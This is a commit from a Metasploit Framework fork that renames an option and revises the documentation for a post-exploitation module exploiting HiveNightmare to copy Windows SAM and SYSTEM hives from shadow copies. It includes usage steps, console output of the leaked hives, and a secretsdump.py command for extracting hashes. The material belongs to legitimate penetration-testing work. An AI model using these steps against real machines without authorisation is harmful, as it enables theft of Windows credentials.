dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Rename an option and update docs for HiveNightmare

This commit is contained in:
Spencer McIntyre 2021-07-29 11:43:57 -04:00
parent fb99af1152
commit 36cc2fd7e5
2 changed files with 29 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
documentation/modules/post/windows/gather/credentials/windows_sam_hivenightmare.md
View File

@ -10,11 +10,15 @@ stored in `store_loot`, you can dump the hashes with some external scripts like
### Installation
VSS is probably already enabled on your Windows 10, if you want to be sure you can follow the steps below :
VSS is probably already enabled on your Windows 10, if you want to be sure you can follow the steps below:
- Go to `System Properties GUI`
- Go to `System Protection`tab
- See in `Protection Settings` list if your drive protection is enabled
* Open the control panel
* Navigate to `System and Security > System`
* Select `System Protection` from the column on the left
* See in `Protection Settings` list if t drive protection is enabled
* Optionally, select `Create` to "Create a resptore point right now..."
* This is necessary if the module can not find an existing Shadow Copy file which can be the case if the Windows
instance is brand new
Be aware that you will need Administrator privileges to follow those steps.
You can read more [here](https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652).
@ -24,15 +28,15 @@ You can read more [here](https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+pe
1. Start `msfconsole`
2. `use post/windows/gather/credentials/windows_sam_hivenightmare`
3. `set NBRE_ITER <number>` to specify the number of iterations on file index (default is 10)
3. `set ITERATIONS <number>` to specify the number of iterations on file index (default is 10)
4. `set FILE_INDEX <number>` optionally if you want to target a specific file index instead of iterating on all indexes in a range
5. `run` the module to exploit the vulnerability and potentially leak SAM and SYSTEM files
## Options
### NBRE_ITER
### ITERATIONS
Set NBRE_ITER to specify the number of iterations on Shadow Copy file index.
Set ITERATIONS to specify the number of iterations on Shadow Copy file index.
Windows is saving those files under the volume name `HarddiskVolumeShadowCopy<index>`.
By default, this module is bruteforcing that `index` value by trying all values between 0 and 10, which you can change if needed.
@ -48,15 +52,18 @@ See the following output:
```
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > run
[!] SESSION may not be compatible with this module (incompatible session type: meterpreter)
[+] SAM data found in HarddiskVolumeShadowCopy5 !
[+] SAM data found in HarddiskVolumeShadowCopy6 !
[+] Retrieving files of index 5 as they are the most recently modified...
[+] SAM data saved at C:/Users/test/.msf4/loot/20210728102132_default_127.0.0.1_windows.sam_851932.bin
[+] SYSTEM data saved at C:/Users/test/.msf4/loot/20210728102220_default_127.0.0.1_windows.system_036753.bin
[+] SAM and SYSTEM data were leaked !
[+] SAM data found in HarddiskVolumeShadowCopy1!
[+] Retrieving files of index 1 as they are the most recently modified...
[+] SAM data saved at /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[+] SYSTEM data saved at /home/smcintyre/.msf4/loot/20210729113926_default_192.168.159.15_windows.system_202176.bin
[+] SAM and SYSTEM data were leaked!
[*] Post module execution completed
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[*] exec: file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
/home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin: MS Windows registry file, NT/2000 or above
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) >
```
Then, you can dump the hashes from leaked files with `secretsdump.py` for instance :
Then, you can dump the hashes from leaked files with `secretsdump.py` for instance:
`python3 secretsdump.py -sam <SAM_FILE> -system <SYSTEM_FILE> LOCAL`

9
modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb
View File

@ -9,7 +9,7 @@ class MetasploitModule < Msf::Post
super(
update_info(
info,
'Name' => 'Windows SAM secrets leak - HiveNightmare aka SeriousSAM',
'Name' => 'Windows SAM secrets leak - HiveNightmare',
'Description' => %q{
Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is possible for an unprivileged
user to read those files. But, as they are locked while Windows is running we are not able
@ -36,12 +36,15 @@ class MetasploitModule < Msf::Post
'SessionTypes' => [ 'meterpreter' ],
'Notes' =>
{
'AKA' => [ 'HiveNightmare', 'SeriousSAM' ],
'Reliability' => [ ],
'SideEffects' => [ ],
'Stability' => [ CRASH_SAFE ]
}
)
)
register_options([
OptInt.new('NBRE_ITER', [true, 'Number of iterations on Shadow Copy file index', 10]),
OptInt.new('ITERATIONS', [true, 'Number of iterations on Shadow Copy file index', 10]),
OptInt.new('FILE_INDEX', [false, 'Optional index parameter to retrieve a specific Shadow Copy file', nil])
])
end
@ -101,7 +104,7 @@ class MetasploitModule < Msf::Post
loot_files(handle, datastore['FILE_INDEX'])
end
else
fail_with(Failure::BadConfig, 'Please specify an iteration number greater than 0!') unless datastore['NBRE_ITER'] > 0
fail_with(Failure::BadConfig, 'Please specify an iteration number greater than 0!') unless datastore['ITERATIONS'] > 0
most_recent_time = nil
most_recent_shadow_copy = nil